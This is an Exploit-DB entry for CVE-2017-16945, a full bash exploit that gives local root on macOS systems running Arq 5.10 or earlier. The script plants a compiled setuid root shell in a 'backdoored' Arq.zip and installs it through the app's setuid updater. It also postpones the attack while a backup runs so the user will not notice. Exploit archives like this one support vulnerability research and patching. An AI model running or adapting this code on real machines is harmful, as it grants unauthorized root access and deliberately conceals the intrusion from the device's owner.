Arq 5.10 - Local root Privilege Escalation (2)

EDB-ID: 43926
Author: Mark Wadham
Published: 2018-01-29
CVE: CVE-2017-16945
Type: Local
Platform: macOS
Aliases: N/A
Advisory/Source: Link
Tags: Local
Vulnerable App: N/A

  
#################################################################
###### Arq <= 5.10 local root privilege escalation exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html ######
#################################################################

app="/Applications/Arq.app"
res="$app/Contents/Resources"
lires="$app/Contents/Library/LoginItems/Arq Agent.app/Contents/Resources"

vuln=`ls -la "$lires/arq_updater" |grep '\-rws' |grep root`

if [ "$vuln" == "" ] ; then
echo "Not vulnerable - auto-updates not enabled."
exit 1
fi

if [ "$1" != "-f" ] ; then
latest_logfile="`ls -1t ~/Library/Logs/Arq\ Agent/ |head -n1`"
status_line="`egrep -i 'backup session.*?(ended|started)' \
\"$HOME/Library/Logs/Arq Agent/$latest_logfile\" |tail -n1 |grep -i started`"

if [ "$status_line" != "" ] ; then
echo -n "WARNING: backup in progress, the user will very "
echo "likely notice if we exploit now!"
echo "use -f to override."
exit 1
fi
fi

owd="`pwd`"

if [ -e ~/.arq_510_privesc_exp ] ; then
rm -rf ~/.arq_510_privesc_exp
fi

mkdir ~/.arq_510_privesc_exp
cd ~/.arq_510_privesc_exp

echo "copying application..."

cp -R /Applications/Arq.app .

echo "compiling payloads..."

cat > payload.sh <<EOF
#!/bin/bash
rm -rf $HOME/.arq_510_privesc_exp
while :
do
pid=\`ps auxwww |grep '$app/Contents/MacOS/Arq' |grep -v grep |xargs \
|cut -d ' ' -f2\`
if [ "\$pid" != "" ] ; then
kill -9 \$pid
open $app/Contents/Library/LoginItems/Arq\ Agent.app
exit 0
fi
done
EOF
chmod 755 payload.sh

au_relative=`echo "$lires/standardrestorer" |sed 's/^\/Applications\///'`

cat > shell.c <<EOF
#include <unistd.h>
#include <string.h>
int main(int ac, char *av[])
{
if (ac > 1 && strcmp(av[1], "boom") == 0) {
setuid(0);
setgid(0);
execl(
"/bin/bash","bash","-c","mv -f $res/standardrestorer.orig $res/standardr"
"estorer;chmod 4755 $res/standardrestorer;$HOME/.arq_510_privesc_exp/pay"
"load.sh;/bin/bash", NULL
);
}
return 0;
}
EOF
mv Arq.app/Contents/Resources/standardrestorer \
Arq.app/Contents/Resources/standardrestorer.orig
gcc -o Arq.app/Contents/Resources/standardrestorer shell.c
rm -f shell.c

payload_size=`stat Arq.app/Contents/Resources/standardrestorer |cut -d ' ' -f8`
GID=`id |sed 's/^.*gid=//' |cut -d '(' -f1`
cwd=`pwd`

echo "creating backdoored Arq.zip..."
zip -1r Arq.zip Arq.app/ 1>/dev/null 2>/dev/null
rm -rf Arq.app/

echo "executing upgrade..."

"$lires/arq_updater" installupdate file://$cwd/Arq.zip $UID $GID YES \
1>/dev/null 2>/dev/null

echo "waiting..."
while :
do
ac_size=`stat $res/standardrestorer 2>/dev/null |cut -d ' ' -f8`
x=`ls -la $res/standardrestorer |grep -- '-rwsr-xr-x' |grep root`

if [ "$ac_size" == "$payload_size" -a "$x" != "" ] ; then
cd "$owd"
$res/standardrestorer boom
exit 0
fi
sleep 0.2
done

Related Posts